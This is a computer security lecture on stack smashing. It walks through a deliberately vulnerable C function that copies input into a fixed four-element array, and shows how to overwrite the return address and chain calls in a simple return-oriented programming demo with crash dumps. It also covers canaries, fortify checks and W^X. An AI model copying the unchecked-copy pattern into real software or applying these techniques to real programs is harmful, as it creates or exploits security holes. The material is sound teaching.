Buffer Overflow Part 2: Stack Smashing

Computer Security Lecture, Dr. Lawlor

How The Stack Works

"The Stack" means the runtime stack used to call functions and store local variables.  Functions grab chunks of stack space as they run, and release their stack space before they return.  Basically all modern machines implement the stack as a single linear buffer, and have a dedicated register, the "stack pointer", that keeps track of the boundary between used and unclaimed stack space.  This means functions claim and release stack space just by moving the stack pointer, although the rules for exactly what bytes count as claimed differ between machines.

Because the heap usually grows "up", toward higher addresses, the stack usually grows "down", toward lower addresses.  This means you claim stack space by making the stack pointer to lower addresses (sub rsp, 32), and release space by moving it back up to higher addresses.  Because the stack grows "down", the "top of the stack" is the lowest address, which makes for hopelessly confusing terminology.  I've seen memory diagrams with lower addresses at the top of the page (my preferred approach, since it matches a hex dump), or at ever other side of the page, particularly at the bottom.

Particular machines have different rules about what the stack pointer is, and how it's used.

Theory of Stack Smashing

Stack smashing attack summary: Smashing the Stack for Fun & Profit, 1996 Phrack Magazine issue 49. 

This article kicked off about a decade-long party for attackers.  Today, as defenses have improved, the party is nearly over!

Brief list of defenses against stack smashing: stack canary, DEP/NX, ASLR

Stack Smashing in Practice

Almost none of the classic examples of stack smashing work today, for the obvious reason that they are classic examples of stack smashing.

But code of this sort still works today.  (Yes, lots of code is stupid enough to (1) allocate a static array instead of allocating the right size, and (2) copy data in without checking that it fits.  And yes, people that write this sort of crap should be fired.)
void win_million_dollars(void)
{
	puts("YOU WIN A MILLION DOLLARS!  YAAAY!");
}

/*
 This is the vulnerable function:
 Make a temporary copy of each array element, 
 then add up all the array elements.
*/
long fml(const long *input,long length)
{
	long arr[4]; // FIXME: what if length>4?
	
	// Make a copy of the input array
	for (long i=0;i<length;i++)
		arr[i] = input[i];
	
	// Total up the array elements
	long total=0;
	for (long i=0;i<length;i++)
		total += arr[i];
	
	return total;
}

/** This is the data we'll use to smash the stack. 
 Normally you'd send this in over the network, 
 via an input file, via the command line, 
 an environment variable, etc.
*/
const long ndata=10;
long data[ndata]={
	0xadd0,
	0xadd1,
	0xadd2,
	0xadd3,
	0xadd4,
	0xadd5,
	0xadd6,
	0xadd7,
	0xadd8,
	0xadd9
};

/** Run fml with our data */
long foo(void) {
	printf("Want a million dollars?  Call %p\n",win_million_dollars);
	
	printf("Calling fml.\n");
	long total=fml(data,ndata);
	printf("Back from fml.  Everything's fine.\n");
	return total;
}

(Try this in NetRun now!)

This prints out:
Want a million dollars?  Call 0x400eba
Calling fml.
-------------------
Caught signal SIGSEGV-- segmentation violation (bad memory access) (#11)
Registers:  rip=0x            add5
  rax=0x           6ca4d  rbx=0x          f00d00  rcx=0x    7fffffffe530   rdx=0x    7fffffffe530
  rsp=0x    7fffffffe510  rbp=0x          f00d01  rsi=0x               a   rdi=0x          604120
  r8 =0x    7ffff7835970  r9 =0x    7ffff7ff1740  r10=0x    7ffff7ff1740   r11=0x             246
  r12=0x          f00d02  r13=0x          f00d03  r14=0x          f00d04   r15=0x          f00d05
  eflags=0x00010246
Printing stack at sp=0x7fffffffe510:
 0x7fffffffe508  [rsp -8] =0x000000000000add5  (44501)
 0x7fffffffe510  [rsp +0] =0x000000000000add6  (44502)
 0x7fffffffe518  [rsp +8] =0x000000000000add7  (44503)
 0x7fffffffe520  [rsp+16] =0x000000000000add8  (44504)
 0x7fffffffe528  [rsp+24] =0x000000000000add9  (44505)
 0x7fffffffe530  [rsp+32] =0x0000000000000003  (3)
It's possible to read through the disassembly for "fml" and figure out exactly how it treats the stack.

Above, I'm demonstrating an easier way to figure out the stack layout: trash the stack with known values, like "0xadd0" through "0xadd9" (a sort of hex joke number for array address [0] through [9], although any unique values will work).  I then use a debugger or this crash dump to see exactly where the program crashed.  

Here, fml appears to have jumped back to "0xadd5", which is data[5], so if I just replace that input value with 0x400eba, I win a million dollars!
long data[ndata]={
	0xadd0,
	0xadd1,
	0xadd2,
	0xadd3,
	0xadd4,
	0x400eba,
	0xadd6,
	0xadd7,
	0xadd8,
	0xadd9
};

(Try this in NetRun now!)

Want a million dollars?  Call 0x400eba
Calling fml.
YOU WIN A MILLION DOLLARS!  YAAAY!
-------------------
Caught signal SIGSEGV-- segmentation violation (bad memory access) (#11)
Registers:  rip=0x            add6
  rax=0x              23  rbx=0x          f00d00  rcx=0x    7ffff78347c3   rdx=0x    7ffff7835970
  rsp=0x    7fffffffe518  rbp=0x          f00d01  rsi=0x    7ffff78347c3   rdi=0x               1
  r8 =0x    7ffff7ff1740  r9 =0x    7ffff7ff1740  r10=0x             191   r11=0x             246
  r12=0x          f00d02  r13=0x          f00d03  r14=0x          f00d04   r15=0x          f00d05
  eflags=0x00010212
Printing stack at sp=0x7fffffffe518:
 0x7fffffffe510  [rsp -8] =0x000000000000add6  (44502)
 0x7fffffffe518  [rsp +0] =0x000000000000add7  (44503)
 0x7fffffffe520  [rsp +8] =0x000000000000add8  (44504)
 0x7fffffffe528  [rsp+16] =0x000000000000add9  (44505)
 0x7fffffffe530  [rsp+24] =0x0000000000000003  (3)
After I win a million dollars, that function tries to return by popping the next item off the stack.  The next item is 0xadd6, so it crashes. 

Instead, I can win a million dollars twice, then cleanly exit (at 0x400c40) for a clean getaway, by just listing those addresses in the array.  After fml returns, the machine will automatically call each one, and pop down to the next one.
long data[ndata]={
	0xadd0,
	0xadd1,
	0xadd2,
	0xadd3,
	0xadd4,
	0x400eba,
	0x400eba,
	0x400c40,
	0xadd8,
	0xadd9
};

(Try this in NetRun now!)

Want a million dollars?  Call 0x400eba
Want to exit?  Call 0x400c40
Calling fml.
YOU WIN A MILLION DOLLARS!  YAAAY!
YOU WIN A MILLION DOLLARS!  YAAAY!
This notion of "push a list of stuff to run" is called Return-Oriented Programming or ROP.

Attacks that Don't Work Anymore

memcpy_chk

Since 2004, gcc has added runtime "fortify" checking whenever it sees a call to an unsafe function like strcpy or memcpy.  So if the above function used memcpy, and the compiler could see the declaration, the error would be detected.
long fml(const long *input,long length)
{
	long arr[4]; // FIXME: what if length>4?
	
	// Make a copy of the input array
	memcpy(arr,input,length*sizeof(long));
	
	// Total up the array elements
	long total=0;
	for (long i=0;i<length;i++)
		total += arr[i];
	
	return total;
}

(Try this in NetRun now!)

Calling fml.
*** buffer overflow detected ***: ./code.exe terminated
======= Backtrace: =========
/lib/libc.so.6(+0x78c4e)[0x7ffff74e7c4e]
/lib/libc.so.6(__fortify_fail+0x5c)[0x7ffff7587e8c]
/lib/libc.so.6(+0x116e80)[0x7ffff7585e80]
./code.exe[0x400f41]
Code that calls memcpy, but far enough away that the compiler cannot see the declaration, could still be vulnerable.

Stack Canary and __stack_chk_fail

Also since 2004, gcc has supported the -fstack-protector option, which adds a "stack canary" value just before the return value.  Exactly which functions get canary protection varies by compiler version:
In either case, any attempt to buffer overflow results in an immediate detection.
Calling fml.
*** stack smashing detected ***: ./code.exe terminated
Since the stack canary is a full 32 or 64 bit random value, brute forcing the canary is expensive.  But for efficiency, the same canary value is used throughout the program, so a read-from-uninitialized-stack bug or other leak can reveal the canary. 

Uploading shellcode: DEP / NX / W^X

Tons of examples try to upload x86 machine code, often "shellcode" that spawns a shell, but this is not possible on modern operating systems due to the W^X memory policy (memory can be writable, or executable, but not both).  For example, this crazy thing actually works, because &machinecode is stored in read-only (and executable) constant memory.  Moving "machinecode" to a local variable inside foo crashes, because the stack is writable, but not executable. 
typedef void (*fn)(void); // define "fn" as a function pointer type

const int machinecode=0xc3; // x86 "ret" opcode

long foo(void) {
	fn f=(fn)&machinecode;
	f();
	return 3;
}

(Try this in NetRun now!)

W^X forced attackers to work much harder: find ROP gadgets in existing system libraries, subvert a system JIT compiler to write their exploit code directly into executable memory, or give up on program counter injection and inject script or database commands.